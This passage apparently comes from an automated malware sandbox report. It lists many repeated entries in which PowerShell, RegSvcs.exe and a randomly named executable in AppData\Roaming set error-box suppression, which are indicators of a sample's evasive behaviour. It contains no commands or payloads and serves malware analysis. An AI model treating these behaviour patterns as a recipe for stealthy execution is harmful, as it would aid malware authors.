                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
